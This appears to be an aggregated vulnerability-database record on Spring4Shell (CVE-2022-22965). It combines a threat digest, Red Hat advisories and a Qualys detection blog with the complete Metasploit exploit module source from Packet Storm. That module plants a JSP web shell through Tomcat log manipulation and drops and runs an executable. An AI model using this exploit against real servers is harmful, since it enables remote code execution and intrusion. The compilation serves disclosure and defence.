vulnerabilities out of which 7 gained the attention of Threat Actors and security researchers worldwide. Among these 10, there were 3 awaiting analysis and 2 were not present in the NVD at all. Hive Pro Threat Research Team has curated a list of 7 CVEs that require immediate action. Furthermore, we also observed three threat actor groups being highly active in the last week. A financially motivated threat actor called TA551 primarily targeted English, German, Italian, and Japanese speakers through IcedID an email-based malware. A new variant of the famous PlugX malware called Talisman has been discovered to be used by Chinese state-sponsored threat actor RedFoxtrot. These attacks were staged on telecommunication and defense sectors in South Asian countries to protect the Belt and Road initiative. Deep Panda aka APT 19, a Chinese APT group, exploited the infamous Log4Shell vulnerability in VMware Horizon servers to stage attack on various sectors across the globe. Common TTPs which could potentially be exploited by these threat actors or CVEs can be found in the detailed section below. Detailed Report: Interesting Vulnerabilities: Vendor CVEs Patch Link CVE-2022-22274 https://www.hivepro.com/dos-vulnerability-discovered-in-sonicwall-next-generation-firewall/ CVE-2022-1040 https://www.hivepro.com/sophos-firewall-rce-vulnerability-actively-exploited/ CVE-2022-22965* https://spring.io/blog/2022/03/31/spring-framework-rce-early-announcement https://tanzu.vmware.com/security/cve-2022-22965 CVE-2022-22674* CVE-2022-22675* https://support.apple.com/en-us/HT213220 CVE-2022-26871* https://files.trendmicro.com/jp/ucmodule/apexcentral/win/2019/apexcentral_2019_gm_win_ja_3945_r3.exehttps://appweb.trendmicro.com/supportNews/NewsDetail.aspx?id=4395 CVE-2022-0342 https://support.zyxel.eu/hc/en-us/articles/4672704562578-USG-FLEX-ATP-Series-Firmware-Update-5-21-Patch-1-Installation-Notes Active Actors: Icon Name Origin Motive TA551 (Gold Cabin, Shathak) Unknown Financial gain RedFoxtrot (Nomad Panda) China Information theft and espionage APT 19 (Deep Panda, Codoso, Sunshop Group, TG-3551, Bronze Firestone, Pupa) China Information theft and espionage Targeted Location: Targeted Sectors: Common TTPs: TA0043: Reconnaissance TA0042: Resource Development TA0001: Initial Access TA0002: Execution TA0003: Persistence TA0004: Privilege Escalation TA0005: Defense Evasion TA0006: Credential Access TA0007: Discovery TA0009: Collection TA0011: Command and Control TA0010: Exfiltration TA0040: Impact T1592: Gather Victim Host Information T1588: Obtain Capabilities T1190: Exploit Public-Facing Application T1059: Command and Scripting Interpreter T1547: Boot or Logon Autostart Execution T1548: Abuse Elevation Control Mechanism T1140: Deobfuscate/Decode Files or Information T1040: Network Sniffing T1087: Account Discovery T1185: Browser Session Hijacking T1071: Application Layer Protocol T1041: Exfiltration Over C2 Channel T1565: Data Manipulation T1588.003: Code Signing Certificates T1566: Phishing T1059.001: PowerShell T1547.001: Registry Run Keys / Startup Folder T1543: Create or Modify System Process T1574: Hijack Execution Flow T1087.002: Domain Account T1005: Data from Local System T1071.001: Web Protocols T1499: Endpoint Denial of Service T1588.006: Vulnerabilities T1566.001: Spearphishing Attachment T1059.005: Visual Basic T1574: Hijack Execution Flow T1574: Hijack Execution Flow T1574.002: DLL Side-Loading T1083: File and Directory Discovery T1056: Input Capture T1573: Encrypted Channel T1499.001: OS Exhaustion Flood T1059.003: Windows Command Shell T1574.002: DLL Side-Loading T1574.002: DLL Side-Loading T1036: Masquerading T1135: Network Share Discovery T1113: Screen Capture T1573.002: Asymmetric Cryptography T1203: Exploitation for Client Execution T1053: Scheduled Task/Job T1055: Process Injection T1112: Modify Registry T1040: Network Sniffing T1105: Ingress Tool Transfer T1106: Native API T1053.005: Scheduled Task T1055.004: Asynchronous Procedure Call T1027: Obfuscated Files or Information T1069: Permission Groups Discovery T1095: Non-Application Layer Protocol T1053: Scheduled Task/Job T1053: Scheduled Task/Job T1027.002: Software Packing T1057: Process Discovery T1053.005: Scheduled Task T1053.005: Scheduled Task T1027.003: Steganography T1012: Query Registry T1569: System Services T1055: Process Injection T1082: System Information Discovery T1569.002: Service Execution T1055.004: Asynchronous Procedure Call T1049: System Network Connections Discovery T1204: User Execution T1620: Reflective Code Loading T1204.002: Malicious File T1014: Rootkit T1047: Windows Management Instrumentation T1218: Signed Binary Proxy Execution T1218.007: Msiexec Threat Advisories: Sophos Firewall RCE vulnerability actively exploited DOS Vulnerability discovered in SonicWall Next-Generation Firewall Prolific threat actor TA551 using new malware IcedID New PlugX variant \u201cTalisman\u201d used by famous Chinese APT RCE Spring Framework Zero-Day vulnerability \u201cSpring4Shell\u201d Two Vulnerabilities affecting Apple macOS exploited-in-the-wild Actively exploited vulnerability affects Trend Micro Apex Central Authentication Bypass Vulnerability in Zyxel Firmware", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-04-05T10:11:43", "type": "hivepro", "title": "Weekly Threat Digest: 28 March \u2013 3 April 2022", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-0342", "CVE-2022-1040", "CVE-2022-22274", "CVE-2022-22674", "CVE-2022-22675", "CVE-2022-22965", "CVE-2022-26871"], "modified": "2022-04-05T10:11:43", "id": "HIVEPRO:21EBEC4DE35422B57481E3DF94E6EA07", "href": "https://www.hivepro.com/weekly-threat-digest-28-march-3-april-2022/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "packetstorm": [{"lastseen": "2022-05-10T15:36:31", "description": "", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-05-10T00:00:00", "type": "packetstorm", "title": "Spring4Shell Spring Framework Class Property Remote Code Execution", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22965"], "modified": "2022-05-10T00:00:00", "id": "PACKETSTORM:167011", "href": "https://packetstormsecurity.com/files/167011/Spring4Shell-Spring-Framework-Class-Property-Remote-Code-Execution.html", "sourceData": "`## \n# This module requires Metasploit: https://metasploit.com/download \n# Current source: https://github.com/rapid7/metasploit-framework \n## \n \nclass MetasploitModule < Msf::Exploit::Remote \n \nRank = ManualRanking # It's going to manipulate the Class Loader \n \nprepend Msf::Exploit::Remote::AutoCheck \ninclude Msf::Exploit::Remote::HttpClient \ninclude Msf::Exploit::FileDropper \ninclude Msf::Exploit::EXE \n \ndef initialize(info = {}) \nsuper( \nupdate_info( \ninfo, \n'Name' => 'Spring Framework Class property RCE (Spring4Shell)', \n'Description' => %q{ \nSpring Framework versions 5.3.0 to 5.3.17, 5.2.0 to 5.2.19, and older versions when running on JDK 9 or above \nand specifically packaged as a traditional WAR and deployed in a standalone Tomcat instance are vulnerable \nto remote code execution due to an unsafe data binding used to populate an object from request parameters \nto set a Tomcat specific ClassLoader. By crafting a request to the application and referencing the \norg.apache.catalina.valves.AccessLogValve class through the classLoader with parameters such as the following: \nclass.module.classLoader.resources.context.parent.pipeline.first.suffix=.jsp, an unauthenticated attacker can \ngain remote code execution. \n}, \n'Author' => [ \n'vleminator <vleminator[at]gmail.com>' \n], \n'License' => MSF_LICENSE, \n'References' => [ \n['CVE', '2022-22965'], \n['URL', 'https://spring.io/blog/2022/03/31/spring-framework-rce-early-announcement'], \n['URL', 'https://github.com/spring-projects/spring-framework/issues/28261'], \n['URL', 'https://tanzu.vmware.com/security/cve-2022-22965'] \n], \n'Platform' => %w[linux win], \n'Payload' => { \n'Space' => 5000, \n'DisableNops' => true \n}, \n'Targets' => [ \n[ \n'Java', \n{ \n'Arch' => ARCH_JAVA, \n'Platform' => %w[linux win] \n}, \n], \n[ \n'Linux', \n{ \n'Arch' => [ARCH_X86, ARCH_X64], \n'Platform' => 'linux' \n} \n], \n[ \n'Windows', \n{ \n'Arch' => [ARCH_X86, ARCH_X64], \n'Platform' => 'win' \n} \n] \n], \n'DisclosureDate' => '2022-03-31', \n'DefaultTarget' => 0, \n'Notes' => { \n'AKA' => ['Spring4Shell', 'SpringShell'], \n'Stability' => [CRASH_SAFE], \n'Reliability' => [REPEATABLE_SESSION], \n'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK] \n} \n) \n) \n \nregister_options( \n[ \nOpt::RPORT(8080), \nOptString.new('TARGETURI', [ true, 'The path to the application action', '/app/example/HelloWorld.action']), \nOptString.new('PAYLOAD_PATH', [true, 'Path to write the payload', 'webapps/ROOT']), \nOptEnum.new('HTTP_METHOD', [false, 'HTTP method to use', 'Automatic', ['Automatic', 'GET', 'POST']]), \n] \n) \nregister_advanced_options [ \nOptString.new('WritableDir', [true, 'A directory where we can write files', '/tmp']) \n] \nend \n \ndef jsp_dropper(file, exe) \n# The sun.misc.BASE64Decoder.decodeBuffer API is no longer available in Java 9. \ndropper = <<~EOS \n<%@ page import=\\\"java.io.FileOutputStream\\\" %> \n<%@ page import=\\\"java.util.Base64\\\" %> \n<%@ page import=\\\"java.io.File\\\" %> \n<% \nFileOutputStream oFile = new FileOutputStream(\\\"#{file}\\\", false); \noFile.write(Base64.getDecoder().decode(\\\"#{Rex::Text.encode_base64(exe)}\\\")); \noFile.flush(); \noFile.close(); \nFile f = new File(\\\"#{file}\\\"); \nf.setExecutable(true); \nRuntime.getRuntime().exec(\\\"#{file}\\\"); \n%> \nEOS \n \ndropper \nend \n \ndef modify_class_loader(method, opts) \ncl_prefix = 'class.module.classLoader' \n \nsend_request_cgi({ \n'uri' => normalize_uri(target_uri.path.to_s), \n'version' => '1.1', \n'method' => method, \n'headers' => { \n'c1' => '<%', # %{c1}i replacement in payload \n'c2' => '%>' # %{c2}i replacement in payload \n}, \n\"vars_#{method == 'GET' ? 'get' : 'post'}\" => { \n\"#{cl_prefix}.resources.context.parent.pipeline.first.pattern\" => opts[:payload], \n\"#{cl_prefix}.resources.context.parent.pipeline.first.directory\" => opts[:directory], \n\"#{cl_prefix}.resources.context.parent.pipeline.first.prefix\" => opts[:prefix], \n\"#{cl_prefix}.resources.context.parent.pipeline.first.suffix\" => opts[:suffix], \n\"#{cl_prefix}.resources.context.parent.pipeline.first.fileDateFormat\" => opts[:file_date_format] \n} \n}) \nend \n \ndef check_log_file \nprint_status(\"#{peer} - Waiting for the server to flush the logfile\") \nprint_status(\"#{peer} - Executing JSP payload at #{full_uri(@jsp_file)}\") \n \nsucceeded = retry_until_true(timeout: 60) do \nres = send_request_cgi({ \n'method' => 'GET', \n'uri' => normalize_uri(@jsp_file) \n}) \n \nres&.code == 200 && !res.body.blank? \nend \n \nfail_with(Failure::UnexpectedReply, \"Seems the payload hasn't been written\") unless succeeded \n \nprint_good(\"#{peer} - Log file flushed\") \nend \n \n# Fix the JSP payload to make it valid once is dropped \n# to the log file \ndef fix(jsp) \noutput = '' \njsp.each_line do |l| \nif l =~ /<%.*%>/ \noutput << l \nelsif l =~ /<%/ \nnext \nelsif l =~ /%>/ \nnext \nelsif l.chomp.empty? \nnext \nelse \noutput << \"<% #{l.chomp} %>\" \nend \nend \noutput \nend \n \ndef create_jsp \njsp = <<~EOS \n<% \nFile jsp=new File(getServletContext().getRealPath(File.separator) + File.separator + \"#{@jsp_file}\"); \njsp.delete(); \n%> \n#{Faker::Internet.uuid} \nEOS \nif target['Arch'] == ARCH_JAVA \njsp << fix(payload.encoded) \nelse \npayload_exe = generate_payload_exe \npayload_filename = rand_text_alphanumeric(rand(4..7)) \n \nif target['Platform'] == 'win' \npayload_path = datastore['WritableDir'] + '\\\\' + payload_filename \nelse \npayload_path = datastore['WritableDir'] + '/' + payload_filename \nend \n \njsp << jsp_dropper(payload_path, payload_exe) \nregister_files_for_cleanup(payload_path) \nend \n \njsp \nend \n \ndef check \n@checkcode = _check \nend \n \ndef _check \nres = send_request_cgi( \n'method' => 'POST', \n'uri' => normalize_uri(Rex::Text.rand_text_alpha_lower(4..6)) \n) \n \nreturn CheckCode::Unknown('Web server seems unresponsive') unless res \n \nif res.headers.key?('Server') \nres.headers['Server'].match(%r{(.*)/([\\d|.]+)$}) \nelse \nres.body.match(%r{Apache\\s(.*)/([\\d|.]+)}) \nend \n \nserver = Regexp.last_match(1) || nil \nversion = Rex::Version.new(Regexp.last_match(2)) || nil \n \nreturn Exploit::CheckCode::Safe('Application does not seem to be running under Tomcat') unless server && server.match(/Tomcat/) \n \nvprint_status(\"Detected #{server} #{version} running\") \n \nif datastore['HTTP_METHOD'] == 'Automatic' \n# prefer POST over get to keep the vars out of the query string if possible \nmethods = %w[POST GET] \nelse \nmethods = [ datastore['HTTP_METHOD'] ] \nend \n \nmethods.each do |method| \nvars = \"vars_#{method == 'GET' ? 'get' : 'post'}\" \nres = send_request_cgi( \n'method' => method, \n'uri' => normalize_uri(datastore['TARGETURI']), \nvars => { 'class.module.classLoader.DefaultAssertionStatus' => Rex::Text.rand_text_alpha_lower(4..6) } \n) \n \n# setting the default assertion status to a valid status \nsend_request_cgi( \n'method' => method, \n'uri' => normalize_uri(datastore['TARGETURI']), \nvars => { 'class.module.classLoader.DefaultAssertionStatus' => 'true' } \n) \nreturn Exploit::CheckCode::Appears(details: { method: method }) if res.code == 400 \nend \n \nExploit::CheckCode::Safe \nend \n \ndef exploit \nprefix_jsp = rand_text_alphanumeric(rand(3..5)) \ndate_format = rand_text_numeric(rand(1..4)) \n@jsp_file = prefix_jsp + date_format + '.jsp' \nhttp_method = datastore['HTTP_METHOD'] \nif http_method == 'Automatic' \n# if the check was skipped but we need to automatically identify the method, we have to run it here \n@checkcode = check if @checkcode.nil? \nhttp_method = @checkcode.details[:method] \nfail_with(Failure::BadConfig, 'Failed to automatically identify the HTTP method') if http_method.blank? \n \nprint_good(\"Automatically identified HTTP method: #{http_method}\") \nend \n \n# if the check method ran automatically, add a short delay before continuing with exploitation \nsleep(5) if @checkcode \n \n# Prepare the JSP \nprint_status(\"#{peer} - Generating JSP...\") \n \n# rubocop:disable Style/FormatStringToken \njsp = create_jsp.gsub('<%', '%{c1}i').gsub('%>', '%{c2}i') \n# rubocop:enable Style/FormatStringToken \n \n# Modify the Class Loader \nprint_status(\"#{peer} - Modifying Class Loader...\") \nproperties = { \npayload: jsp, \ndirectory: datastore['PAYLOAD_PATH'], \nprefix: prefix_jsp, \nsuffix: '.jsp', \nfile_date_format: date_format \n} \nres = modify_class_loader(http_method, properties) \nunless res \nfail_with(Failure::TimeoutExpired, \"#{peer} - No answer\") \nend \n \n# No matter what happened, try to 'restore' the Class Loader \nproperties = { \npayload: '', \ndirectory: '', \nprefix: '', \nsuffix: '', \nfile_date_format: '' \n} \n \nmodify_class_loader(http_method, properties) \n \ncheck_log_file \n \nhandler \nend \n \n# Retry the block until it returns a truthy value. Each iteration attempt will \n# be performed with expoential backoff. If the timeout period surpasses, false is returned. \ndef retry_until_true(timeout:) \nstart_time = Process.clock_gettime(Process::CLOCK_MONOTONIC, :second) \nending_time = start_time + timeout \nretry_count = 0 \nwhile Process.clock_gettime(Process::CLOCK_MONOTONIC, :second) < ending_time \nresult = yield \nreturn result if result \n \nretry_count += 1 \nremaining_time_budget = ending_time - Process.clock_gettime(Process::CLOCK_MONOTONIC, :second) \nbreak if remaining_time_budget <= 0 \n \ndelay = 2**retry_count \nif delay >= remaining_time_budget \ndelay = remaining_time_budget \nvprint_status(\"Final attempt. Sleeping for the remaining #{delay} seconds out of total timeout #{timeout}\") \nelse \nvprint_status(\"Sleeping for #{delay} seconds before attempting again\") \nend \n \nsleep delay \nend \n \nfalse \nend \nend \n`\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "sourceHref": "https://packetstormsecurity.com/files/download/167011/spring_framework_rce_spring4shell.rb.txt"}], "redhatcve": [{"lastseen": "2022-05-21T01:03:03", "description": "A flaw was found in Spring Framework, specifically within two modules called Spring MVC and Spring WebFlux, (transitively affected from Spring Beans), using parameter data binding. This flaw allows an attacker to pass specially-constructed malicious requests to certain parameters and possibly gain access to normally-restricted functionality within the Java Virtual Machine.\n#### Mitigation\n\nFor those who are not able to upgrade affected Spring classes to the fixed versions, there is a workaround customers can implement for their applications, via setting disallowed fields on the data binder, and denying various iterations of the string "class.*" \n\n\nFor full implementation details, see Spring's early announcement post in the "suggested workarounds" section: <https://spring.io/blog/2022/03/31/spring-framework-rce-early-announcement#suggested-workarounds> \n\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-03-31T18:32:57", "type": "redhatcve", "title": "CVE-2022-22965", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22965"], "modified": "2022-05-21T00:10:46", "id": "RH:CVE-2022-22965", "href": "https://access.redhat.com/security/cve/cve-2022-22965", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-04-12T13:59:49", "description": "A flaw was found in Spring Cloud Function via the spring.cloud.function.routing-expression header that is modified by the attacker to contain malicious expression language code. The attacker is able to call functions that should not normally be accessible, including runtime exec calls.\n#### Mitigation\n\nAffected customers should update immediately as soon as patched software is available. There are no other mitigations available at this time. \n\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-03-31T18:32:29", "type": "redhatcve", "title": "CVE-2022-22963", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22963", "CVE-2022-22965"], "modified": "2022-04-12T10:02:27", "id": "RH:CVE-2022-22963", "href": "https://access.redhat.com/security/cve/cve-2022-22963", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "qualysblog": [{"lastseen": "2022-04-08T16:57:59", "description": "_This page last updated: April 7th_\n\nA new zero-day Remote Code Execution (RCE) vulnerability, \u201cSpring4Shell\u201d or \u201cSpringShell\u201d was disclosed in the Spring framework. An unauthorized attacker can exploit this vulnerability to remotely execute arbitrary code on the target device. \n\n### What is Spring Framework? \n\nSpring-core is a prevalent framework widely used in Java applications that allows software developers to develop Java applications with enterprise-level components effortlessly. \n\n### Which versions are vulnerable? \n\nThe vulnerability requires JDK version 9 or later to be running. Spring Framework versions 5.3.0 to 5.3.17, 5.2.0 to 5.2.19, and older versions are vulnerable. It allows remote attackers to plant a web shell when running Spring framework apps on top of JRE 9. It is caused by unsafe deserialization of given arguments that a simple HTTP POST request can trigger to allow full remote access. \n\n### How can this be exploited? \n\nThe exploitation of this vulnerability relies on an endpoint with DataBinder enabled, which decodes data from the request body automatically. This property could enable an attacker to leverage Spring4Shell against a vulnerable application. In fact, the Spring framework class DataBinder warns about this in its [documentation](<https://docs.spring.io/spring-framework/docs/current/javadoc-api/org/springframework/validation/DataBinder.html>): \n\n\u201cNote that there are potential security implications in failing to set an array of allowed fields. In the case of HTTP form POST data, for example, malicious clients can attempt to subvert an application by supplying values for fields or properties that do not exist on the form. In some cases, this could lead to illegal data being set on command objects or their nested objects. For this reason, it is highly recommended to specify the allowedFields property on the DataBinder.\u201d \n\n### What are the prerequisites to exploit this vulnerability? \n\n * JDK 9 or higher \n * Apache Tomcat as the Servlet container \n * Packaged as a traditional WAR (in contrast to a Spring Boot executable jar) \n * spring-webmvc or spring-webflux dependency \n * Spring Framework versions 5.3.0 to 5.3.17, 5.2.0 to 5.2.19, and older versions \n\n### Is there a patch available for Spring4Shell? \n\nSpring Framework 5.3.18 and 5.2.20, that contain the fixes, have been released. If you\u2019re able to upgrade to Spring Framework **5.3.18** and **5.2.20**, no workarounds are necessary. \n\nIn case you cannot update to the latest Spring Framework version upgrading to Apache Tomcat **10.0.20**, **9.0.62**, or **8.5.78** provides adequate protection but not solves the vulnerability completely. \n\nIn addition, there are multiple working proof-of-concept (PoC) exploits available for Spring4Shell. We strongly recommend that organizations deploy these mitigations or use a third-party firewall for defense. \n\n### Qualys Coverage \n\nQualys Research Team has released the following authenticated QIDs to address this vulnerability for now. These QIDs will be available starting with vulnsigs version VULNSIGS-2.5.438-3 and in Cloud Agent manifest version LX_MANIFEST-2.5.438.3-2. \n\n**QID**| **Title**| **Version**| **Available for** \n---|---|---|--- \n376506| Spring Core Remote Code Execution (RCE) Vulnerability (Spring4Shell)| VULNSIGS-2.5.438-3| Scanner/Cloud Agent \n45525| Spring core or Spring beans jar detected| VULNSIGS-2.5.438-3| Scanner/Cloud Agent \n150494| Spring Cloud Function Remote Code Execution (RCE) Vulnerability (CVE-2022-22963)| VULNSIGS-2.5.440-3| Web Application Security \n376508| Spring Cloud Function Remote Code Execution (RCE) Vulnerability (Authenticated)| VULNSIGS-2.5.440-6/ lx_manifest-2.5.440.6-5| Scanner/Cloud Agent \n730418| Spring Cloud Function Remote Code Execution (RCE) Vulnerability (Unauthenticated Check)| VULNSIGS-2.5.440-6| Scanner \n150495 | Spring Core Remote Code Execution (RCE) Vulnerability CVE-2022-22965 (Spring4Shell) | VULNSIGS-2.5.443-3 | Web Application Security \n48209 | Spring Framework and Spring Boot JARs Spring Cloud JARs Detected Scan Utility | VULNSIGS-2.5.444-2/manifest 2.5.444.2-1 | Scanner/Cloud Agent \n376514 | Spring Framework Remote Code Execution (RCE) Vulnerability (Spring4Shell) Scan Utility | VULNSIGS-2.5.444-2/manifest 2.5.444.2-1 | Scanner/Cloud Agent \n376520 | Spring Cloud Function Remote Code Execution (RCE) Vulnerability Scan Utility | VULNSIGS-2.5.444-2/manifest 2.5.444.2-1 | Scanner/Cloud Agent \n730416 | Spring Core Remote Code Execution (RCE) Vulnerability (Spring4Shell) (Unauthenticated Check) | VULNSIGS-2.5.445-3 | Scanner \n \n### Discover Your Attack Surface with up-to-date CyberSecurity Asset Management \n\nAs a first step, Qualys recommends assessing all assets in your environment to map the entire attack surface of your organization. \n\n#### Scoping Potential Attack Surface \n\nQualys Cybersecurity Asset Management (CSAM) continuously inventories all your assets and software. Use CSAM to find assets with Apache Tomcat running on JDK 9 or higher. \n \n \n QQL: _software:(name:tomcat) and software:(name:\"jdk\" and version>=9)___ \n\n\n\n#### Finding Vulnerable Spring Components and Versions \n\nQualys CSAM can further help you narrow down the scope by adding Spring Framework to the search criteria, and specifically match on vulnerable components and versions. This can be used to find assets that have not yet been scanned with VMDR for the Spring4Shell QIDs yet. \n \n \n QQL: software:(name:tomcat) and software:(name:\"jdk\" and version>=9) and software:(name:\"Spring\" and version:\"vulnerable\") \n\n#### Monitoring Upgrades and Mitigations \n\nUpgrading to Spring Framework 5.3.18+ or 5.2.20+ addresses the root cause and prevents other attack vectors, and it adds protection for other CVEs. Qualys CSAM allows customers to list all Spring Framework versions and verify upgrades. \n\nHowever, some may be in a position where upgrading is not possible to do quickly. VMware provided the mitigation alternative to upgrade Apache Tomcat to versions 10.0.20, 9.0.62, or 8.5.78, which close the attack vector on Tomcat\u2019s side. Qualys CSAM allows you to check for the presence or absence of these Tomcat updates. \n\nQQL for assets with mitigated Tomcat: \n \n \n software:(name:tomcat and update:[`10.0.20`,`9.0.62`,`8.5.78`]) \n\nQQL for assets excluding mitigated Tomcat: \n \n \n software:(name:tomcat and not update:[`10.0.20`,`9.0.62`,`8.5.78`]) and software:(name:\"jdk\" and version>=9) and software:(name:\"Spring\" and version:\"vulnerable\") \n\n#### Context Is Critical to Prioritize and Remediate \n\nSecurity teams need to understand the distribution of affected assets from different perspectives, such as internet-exposed, production versus non-production, and which of these assets support business-critical services. Qualys CSAM integrates with additional sources, to import asset and business context, that helps customers further understand their impact, prioritize assets based on business criticality, and work with corresponding asset owners and support groups to take remedial actions. \n\nQQL for assets with Tomcat exposed to the internet and visible in Shodan: \n \n \n software:(name:tomcat) and software:(name:\"jdk\" and version>=9) and tags.name:shodan \n\n\n\n### Detect the Vulnerability with Qualys WAS\n\nSecond, protect your public Internet-facing apps, as they are the most exposed to attack and therefore high priority. \n\nThe Qualys WAS Research Team has developed two signatures for detecting vulnerable versions of the Spring Framework. \n\n * QID 150494 (released April 1st) will report vulnerable versions of Spring Cloud Applications (CVE-2022-22963). \n * QID 150495 (released on 6th) will report vulnerable versions of Spring Core Applications (CVE-2022-22965). \n\nThese QIDs are automatically added to the Core Detection Scope. If you are scanning web applications with the Initial WAS Option Profile then there is no further action necessary. Your scans will automatically test for vulnerable versions of the Spring Framework and report any vulnerable instances found. \n\nIf you are using a custom Option Profile for your scans, please ensure you are either using the Core Detection Scope in your Option Profile or adding the above QIDs to any static or dynamic Custom Search Lists. \n\n\n\nThese QIDs collectively use a combination of Out-of-Band and non-Out-of-Band tests for accurate detection. \n\n\n\nThe WAS Research Team is investigating other safe methods for detecting this vulnerability to compensate for potential False Negatives or False Positive cases. In the meantime, it is recommended to use WAS in coordination with other Qualys modules for a more comprehensive methodology for detecting the Spring4Shell vulnerability. \n\nIf your application is vulnerable to Spring4Shell, it is recommended that you immediately follow the steps outlined in the \u201cIs there a patch available for Spring4Shell?\u201d section of this blog. \n\n### Detect Spring4Shell Vulnerability Using Qualys VMDR\n\nNext, it\u2019s time to find Spring4Shell wherever it is hiding in your environment and prioritize your response. \n\nQualys VMDR customers should ensure all their assets are scanned against the above QIDs. As this vulnerability only targets the Spring Framework when deployed with JDK>9 and Tomcat, customers must at least ensure assets with Tomcat and JDK>9 are scanned. The following QQL can be used to find such assets: \n \n \n software:(name:tomcat and not update:[`10.0.20`,`9.0.62`,`8.5.78`]) and software:(name:\"jdk\" and version>=9) \n\n\n\nOnce assets have been scanned for the above QIDs, customers can use the following QQL to search for the Spring4Shell vulnerability in their environment: \n\nvulnerabilities.vulnerability.qid:376506 \n\n\n\n### Track Spring4Shell Progress with Unified Dashboard\n\nThe Unified Dashboard enables you to track this vulnerability and its impacted hosts, their status, and overall management in real-time. To help you quickly find vulnerable hosts and software, a new unified dashboard is created on the Qualys platform. This dashboard has extremely useful widgets listing all the vulnerable hosts, applications with vulnerable versions of Spring, and most importantly all the vulnerable hosts visible on the Internet. It provides visibility to compliance configurations and software on your \u2018External Attack Surface\u2019 visible on [Shodan](<https://blog.qualys.com/vulnerabilities-threat-research/2021/12/20/qualys-integrates-with-shodan-to-help-map-the-external-attack-surface>) being the low-hanging opportunities for attackers. These widgets also list workloads hosted on shared cloud infrastructure and that have public IP addresses. To use this capability, download and import this Global Dashboard. \n\n[[Download and import \u201cSpring4Shell\u201d Global 